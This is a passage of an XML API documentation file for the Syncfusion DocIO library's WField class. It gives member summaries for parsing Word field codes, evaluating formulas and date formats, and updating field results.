        </member>
        <member name="F:Syncfusion.DocIO.DLS.WField.m_localRef">
            <summary>
            Local reference string for the hyperlink
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WField.m_fieldCode">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WField.m_sourceFldType">
            <summary>
            The source field type value (used in case field type is unknown)
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WField.m_resultFormat">
            <summary>
            Preserves the character formatting of field's previous result.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Creates a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WField"/> class with specified <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The Word document instance</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.CreateLayoutInfo">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SetFieldType(Syncfusion.DocIO.FieldType)">
            <summary>
            Set Field Type
            </summary>
            <param name="fieldType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.ParseFieldCode(System.String)">
            <summary>
            
            </summary>
            <param name="fieldCode"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateFieldCode(System.String)">
            <summary>
            Updates Field code 
            </summary>
            <param name="fieldCode"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.CheckFieldWithoutSeparator">
            <summary>
            TCEntry,TOA entry,Index Entry ,Ref Doc,FieldPrivate
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SetTextFormatSwitchString">
            <summary>
             Set the TextFormat Switch String
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SetLocalSwitchString">
            <summary>
            Set the Local Switch String
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SetScreenTipAndPositionSwitch(System.String,System.Int32,System.String)">
            <summary>
            Sets the screen tip and position switch.
            </summary>
            <param name="fieldCode">The field code.</param>
            <param name="switchStartIndex">Start index of the switch.</param>
            <param name="formattingSwitch">The formatting switch.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.ConvertSwitchesToString">
            <summary>
            Converts the switches to string.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attaches to paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="itemPos">The item pos.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.Detach">
            <summary>
            Detaches from owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.RemoveItemsUptoFieldEnd(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Removes the paragraph child items upto field end
            </summary>
            <param name="ownerParagraph">Owner paragraph</param>
            <param name="startItemIndex">Start item index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.AttachToDocument">
            <summary>
            Clones the relations.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.CloneImpl">
            <summary>
            Clones itself.
            <exclude/>
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetAsSymbol">
            <summary>
            Gets the field as WSymbol item.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetSection(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get owner section
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.EnsureBookmarkStart(Syncfusion.DocIO.DLS.BookmarkStart)">
            <summary>
            To ensure for the BookmarkStart has been added to the owner document
            </summary>
            <param name="bookmarkStart">The Bookmark Start used to start removing the merge field collection</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.EnsureBookmarkStart(Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            To ensure for the BookmarkEnd has been added to the owner document
            </summary>
            <param name="bookmarkStart">The Bookmark end used to stop removing the merge field collection</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetResultCharacterFormatting">
            <summary>
            Gets the result character formatting.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetIncudePictureFieldResult">
            <summary>
            Gets the content of the field.
            </summary>
            <param name="field">The field.</param>
            <returns>ParagraphItem.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetNextSibling">
            <summary>
            Get the next sibling
            </summary>
            <param name="item"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.Update">
            <summary>
            Updates the field result for this <see cref="T:Syncfusion.DocIO.DLS.WField"/>.
            </summary>
            <remarks>
            <para>Essential DocIO currently support the updating of field result for the following field types only:</para>
            <list type="buttet">
            <item>= (formula field)</item>
            <item>DATE</item>
            <item>TIME</item>
            <item>DOCVARIABLE </item>
            <item>DOCPROPERTY</item>
            <item>COMPARE</item>
            <item>IF</item>
            <item>NEXTIF</item>
            <item>MERGEREC</item>
            <item>MERGESEQ</item>
            <item>SECTION</item>
            <item>NUMPAGES</item>
            <item>TITLE</item>
            <item>Cross-Reference</item>
            </list>
            <para>Also while updating of NUMPAGES field and Cross Reference field with Page number and Paragraph number options are not supported in Silverlight, WinRT, Universal, Windows Phone and Xamarin platforms.</para>
            <para>Currently group shapes, drawing canvas, and table auto resizing are not supported in Word to PDF lay outing, and this may lead to update incorrect page number and total number of pages.</para>
            </remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateDocumentBuiltInProperties(System.String)">
            <summary>
            Updates the document built in properties.
            </summary>
            <param name="propertyName">Name of the property.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.RemoveStringFormat(System.String,System.Boolean@)">
            <summary>
            Removes the string format.
            </summary>
            <param name="fieldCode">The field code.</param>
            <param name="isHavingStringFormat">if set to <c>true</c> [is having string format].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateDateField(System.String,System.DateTime)">
            <summary>
            Update Datefield
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetOrdinalstring(System.Boolean,System.String)">
            <summary>
            Get ordinal string for numeric value
            </summary>
            <param name="ordinalString">Ordinal string</param>
            <param name="text">text</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetCardTextString(System.Boolean,System.String)">
            <summary>
            Gets the card text string.
            </summary>
            <param name="cardinalString">if set to <c>true</c> [cardinal string].</param>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetOrdTextString(System.Boolean,System.String)">
            <summary>
            Gets the ord text string.
            </summary>
            <param name="ordinalString">if set to <c>true</c> [ordinal string].</param>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.NumberToWords(System.Int32,System.Boolean)">
            <summary>
            Numbers to words.
            </summary>
            <param name="number">The number.</param>
            <param name="isCardText">if set to <c>true</c> [is card text].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateNextIfField">
            <summary>
            Updates the next if field.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateSectionField">
            <summary>
            Updates the section field.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.IsPictureSwitchIsInSecondPlace">
            <summary>
            Determines whether [is picture switch is in second place].
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateNumberFormatResult(System.String)">
            <summary>
            Updates the number format result.
            </summary>
            <param name="result">The result.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateDocPropertyField">
            <summary>
            Updates the doc property field.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateTextFormat(System.String)">
            <summary>
            Updates the DocVariable field or MergeField value with text formats applied
            </summary>
            <param name="text">The text</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateTextFormat(System.String,System.String)">
            <summary>
            Updates the text format of the field
            </summary>
            <param name="text">The text</param>
            <param name="formattingString">The formatting string</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetNumberFormat(System.String)">
            <summary>
            Gets Number format based on invariant culture
            </summary>
            <param name="numberFormat"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateRefField">
            <summary>
            Updates the reference field.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.CompareOwnerTextBody(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Checks the text body owner.
            </summary>
            <param name="bookmark">The bookmark.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateRefFieldResult(System.Collections.Generic.List{Syncfusion.DocIO.DLS.Entity})">
            <summary>
            Updates the reference field result.
            </summary>
            <param name="fieldResult">The field result.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetHierarchicalIndex(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets the index of the hierarchical.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetPositionValue(Syncfusion.DocIO.DLS.BookmarkStart)">
            <summary>
            Gets the position value.
            </summary>
            <param name="bkStart">The bookmark.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.CompareHierarchicalIndex(System.String,System.String)">
            <summary>
            Compares the index of the hierarchical.
            </summary>
            <param name="value1">The value1.</param>
            <param name="value2">The value2.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetDateValue(System.String,System.DateTime)">
            <summary>
            Get the date value
            </summary>
            <param name="text"></param>
            <param name="date"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateCustomDay(System.Int32,System.DateTime,System.Int32)">
            <summary>
            Updating custom day value
            </summary>
            <param name="dateValue"></param>
            <param name="currentDateTime"></param>
            <param name="count"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateCustomMonth(System.Int32,System.DateTime,System.Int32)">
            <summary>
            Updating the custom month value 
            </summary>
            <param name="dateValue"></param>
            <param name="currentDateTime"></param>
            <param name="count"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateCustomYear(System.Int32,System.DateTime,System.Int32)">
            <summary>
            Update the custom year value
            </summary>
            <param name="dateValue"></param>
            <param name="currentDateTime"></param>
            <param name="count"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetNumber(System.String,System.Boolean@)">
            <summary>
            To Get Number from text
            </summary>  
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetNumberAlphabet(System.String)">
            <summary>
            To Get the number from alphabet string
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.TrimBeginingText(System.String)">
            <summary>
            Removes the unwanted text in the begining of the field code
            </summary>
            <param name="fieldCode"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.TrimEndText(System.String)">
            <summary>
            Removes the unwanted text in the end of the field code
            </summary>
            <param name="fieldCode"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.RemoveText(System.String,System.String)">
            <summary>
            Removes the text.
            <exclude/>
            </summary>
            <param name="text">The text.</param>
            <param name="textToRevome">The text to revome.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SplitIfArguments(System.String)">
            <summary>
            Splits if arguments.
            <exclude/>
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SplitFieldCode(System.Int32,System.String@,System.String@)">
            <summary>
            Splits the field code.
            </summary>
            <param name="tableStart">The table start.</param>
            <param name="text">The text.</param>
            <param name="condition">The condition.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SplitFieldCode(System.Collections.Generic.List{System.String},System.Collections.Generic.List{System.String},System.Collections.Generic.List{System.Int32},System.Boolean,System.String@,System.String@)">
            <summary>
            Splits the field code.
            </summary>
            <param name="operators">The operators.</param>
            <param name="arguments">The arguments.</param>
            <param name="operatorIndex">Index of the operator.</param>
            <param name="isOperator">if set to <c>true</c> [is operator].</param>
            <param name="text">The text.</param>
            <param name="condition">The condition.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.IsOperator(System.Collections.Generic.List{System.String},System.String@,System.String@)">
            <summary>
            Determines whether the specified operators is operator.
            </summary>
            <param name="operators">The operators.</param>
            <param name="text">The text.</param>
            <param name="condition">The condition.</param>
            <returns>
            	<c>true</c> if the specified operators is operator; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetOperatorIndex(System.Collections.Generic.List{System.String},System.String)">
            <summary>
            Gets the index of the operator.
            </summary>
            <param name="operators">The operators.</param>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetTextInTable(System.String@)">
            <summary>
            Gets the text in table.
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateCondition(System.String)">
            <summary>
            Updates the condition.
            <exclude/>
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateCompareField">
            <summary>
            Updates the compare field.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.CompareExpression(System.Double,System.Double,System.String)">
            <summary>
            Compares the expression.
            </summary>
            <param name="operand1">The operand1.</param>
            <param name="operand2">The operand2.</param>
            <param name="operation">The operation.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateFormulaField">
            <summary>
            Updates the formula field.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateNumberFormat(System.String,System.String)">
            <summary>
            Updates the number format.
            </summary>
            <param name="text">The text.</param>
            <param name="numberFormat">The number format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.RemoveMergeFormat(System.String)">
            <summary>
            Removes the merge format.
            <exclude/>
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.RemoveMergeFormat(System.String,System.String@)">
            <summary>
            Removes the merge format.
            <exclude/>
            </summary>
            <param name="fieldCode">The field code.</param>
            <param name="numberFormat">The number format</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateFormula(System.String)">
            <summary>
            Updates the formula.
            </summary>
            <param name="fieldCode">The field code.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateFunction(System.String)">
            <summary>
            Updates the function.
            </summary>
            <param name="fieldCode">The field code.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.Product(System.Collections.Generic.List{System.Double})">
            <summary>
            Calulates the product of specified operands.
            </summary>
            <param name="operands">The operands.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.Sum(System.Collections.Generic.List{System.Double})">
            <summary>
            Calulates the sum of specified operands.
            </summary>
            <param name="operands">The operands.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.Average(System.Collections.Generic.List{System.Double})">
            <summary>
            Calulates the average of specified operands.
            </summary>
            <param name="operands">The operands.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.RoundOf(System.Double,System.Int32)">
            <summary>
            Rounds of the operand to specified decimal point.
            </summary>
            <param name="operand">The operand.</param>
            <param name="decimalPoint">The decimal point.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.Defined(System.String)">
            <summary>
            Checks whether the specified operand is numeric value.
            </summary>
            <param name="operand">The operand.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.IsFunction(System.String)">
            <summary>
            Determines whether the specified text is function.
            </summary>
            <param name="text">The text.</param>
            <returns>
            	<c>true</c> if the specified text is function; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.IsExpression(System.String)">
            <summary>
            Determines whether the specified text is expression.
            </summary>
            <param name="text">The text.</param>
            <returns>
            	<c>true</c> if the specified text is expression; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateExpression(System.String)">
            <summary>
            Updates the expression.
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.EvaluateExpression(System.Collections.Generic.List{System.String}@,System.String)">
            <summary>
            Evaluates the expression.
            </summary>
            <param name="expression">The expression.</param>
            <param name="operation">The operation.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SplitExpression(System.String,System.Collections.Generic.List{System.String})">
            <summary>
            Splits the expression.
            </summary>
            <param name="text">The text.</param>
            <param name="operators">The operators.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SplitOperands(System.String)">
            <summary>
            Splits the operands.
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateFieldRange">
            <summary>
            Updates the nested field code.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateNestedFieldCode">
            <summary>
            Updates the nested field code.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateTextForTextBodyItem(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Updates the text for text body item.
            <exclude/>
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateTextForTable(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Updates the text for table.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateTextForParagraphItem(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Updates the text for paragraph item.
            <exclude/>
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetFieldResult">
            <summary>
            Gets the field result.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.ParseFieldValue(System.String)">
            <summary>
            
            </summary>
            <param name="fieldValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.ClearStringFromOtherCharacters(System.String)">
            <summary>
            
            </summary>
            <param name="value"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.RemoveFieldSeparator(Syncfusion.DocIO.DLS.WFieldMark)">
            <summary>
            Remove the field separator for the TOC entry,TOA entry,Index entry,Ref Doc and Private
            </summary>
            <param name="fieldMark"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.ParseField(System.String)">
            <summary>
            Parses the field.
            <exclude/>
            </summary>
            <param name="fieldCode">The field code.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.ParseFieldFormat(System.String[])">
            <summary>
            Parses the field format.
            <exclude/>
            </summary>
            <param name="fieldValues">The field values.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.ParseLocalRef(System.String,System.Int32)">
            <summary>
            Parses the local reference string for the hyperlink.
            </summary>
            <param name="fieldCode">The field code.</param>
            <param name="startPos">The start pos.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SetModified">
            <summary>
            Sets the modified.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.ParseSwitches(System.String,System.Int32)">
            <summary>
            Parse the switches
            </summary>
            <param name="text">Text</param>
            <param name="index">Index</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.RemoveMeridiem(System.String,System.Boolean@)">
            <summary>
            Removes the Meridiem if present
            </summary>
            <param name="text">Text</param>
            <param name="isMeridiumDefined">Is Meridiem defined</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateMeridiem(System.String,System.DateTime)">
            <summary>
            Updates the Meridiem
            </summary>
            <param name="text">Text</param>
            <param name="currentDateTime">Current date time</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateDateValue(System.String,System.DateTime)">
            <summary>
            Updates the date value
            </summary>
            <param name="text">Text</param>
            <param name="currentDateTime">Current date Time</param>
            <returns>Updated date value</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateDay(System.String,System.DateTime,System.Int32)">
            <summary>
            Updates Day
            </summary>
            <param name="dateValue">Date value</param>
            <param name="currentDateTime">Current date time</param>
            <param name="count">Count</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetCulture(Syncfusion.DocIO.LocaleIDs)">
            <summary>
            Gets the culture.
            </summary>
            <param name="localID">The local ID.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateMonth(System.String,System.DateTime,System.Int32)">
            <summary>
            Updates Month
            </summary>
            <param name="dateValue">Date value</param>
            <param name="currentDateTime">Current date time</param>
            <param name="count">Count</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateYear(System.String,System.DateTime,System.Int32)">
            <summary>
            Updates year
            </summary>
            <param name="dateValue">Date value</param>
            <param name="currentDateTime">Current date time</param>
            <param name="count">Count</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateHour(System.String,System.DateTime,System.Int32,System.Boolean)">
            <summary>
            Updates hour
            </summary>
            <param name="dateValue">Date value</param>
            <param name="currentDateTime">Current date time</param>
            <param name="count">Count</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateMinute(System.String,System.DateTime,System.Int32)">
            <summary>
            Updates Minute
            </summary>
            <param name="dateValue">Date value</param>
            <param name="currentDateTime">Current date time</param>
            <param name="count">Count</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateSecond(System.String,System.DateTime,System.Int32)">
            <summary>
            Updates Seconds
            </summary>
            <param name="dateValue">Date value</param>
            <param name="currentDateTime">Current date time</param>
            <param name="count">Count</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.CheckFieldSeparator">
            <summary>
            Checks the field separator.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetFormattingForHyperLink">
            <summary>
            Gets the formatting for hyper link.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetClonedTable(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets the cloned table.
            <exclude/>
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateClonedTextBodyItem(Syncfusion.DocIO.DLS.WTextBody,Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Updates the cloned text body item.
            </summary>
            <param name="source">The source.</param>
            <param name="destination">The destination.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetClonedParagraph(Syncfusion.DocIO.DLS.Entity,System.String,Syncfusion.DocIO.DLS.Entity@)">
            <summary>
            Gets the cloned paragraph.
            </summary>
            <param name="entity">The entity.</param>
            <param name="txt">The TXT.</param>
            <param name="nextItem">The next item.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateFieldItems(Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.DLS.Entity,Syncfusion.DocIO.DLS.WParagraph,System.Collections.Generic.List{Syncfusion.DocIO.DLS.Entity}@)">
            <summary>
            Updates the field items.
            </summary>
            <param name="item">The item.</param>
            <param name="entity">The entity.</param>
            <param name="paragraph">The paragraph.</param>
            <param name="itemsToUpdate">The items to update.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetParagraphItemIndex(Syncfusion.DocIO.DLS.Entity,System.String)">
            <summary>
            Gets the index of the paragraph item.
            </summary>
            <param name="entity">The entity.</param>
            <param name="txt">The TXT.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetStartItemIndex(System.Int32,System.String@)">
            <summary>
            Gets the start index of the item.
            </summary>
            <param name="index">The index.</param>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.MergeFieldMarkParagraphs">
            <summary>
            Merges the field mark paragraphs.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.RemovePreviousResult">
            <summary>
            Removes the previous result.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.CheckPragragh(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Checks the pragragh.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateParagraphText(Syncfusion.DocIO.DLS.WParagraph,System.Boolean,System.String@)">
            <summary>
            Updates the paragraph text.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="isLastItem">if set to <c>true</c> [is last item].</param>
            <param name="result">The result.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetParagraphItemText(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Gets the paragraph item text.
            </summary>
            <param name="item">The item.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateFieldResult(System.String)">
            <summary>
            Updates the field result.
            </summary>
            <param name="text">The text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.UpdateFieldResult(System.String,System.Boolean)">
            <summary>
            Updates the field result.
            </summary>
            <param name="text">The text.</param>
            <param name="isFromHyperLink">if set to <c>true</c> [is from hyper link].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetTextRange(System.String)">
            <summary>
            Gets the text range.
            <exclude/>
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SkipLayoutingOfFieldCode">
            <summary>
            Skips the layouting of field code.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SkipLayoutingOfParagraphItem(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Skips the layouting of paragraph item.
            </summary>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SkipLayoutingOfTextBodyItem(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Skips the layouting of text body item.
            </summary>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.SkipLayoutingOfTable(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Skips the layouting of table.
            </summary>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetCharacterFormat">
            <summary>
            Get CharacterFormat of the PAGE and NUMPAGES field based on TextRanges preserved inside the field
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.IsBookmarkCrossRefField(System.String@)">
            <summary>
            Determine whether the current Reference field as Bookmark cross reference field
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetCurrentTextRange">
            <summary>
            Get Text Range preserved inside the PAGE and NUMPAGES field
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WField.GetBookmarkOfCrossRefField(System.Boolean@)">
            <summary>
            Determine whether the current Reference field as Bookmark cross reference field
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.TextFormat">
            <summary>
            Gets or sets the text format field switch that defines how to display field results.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.EntityType">
            <summary>
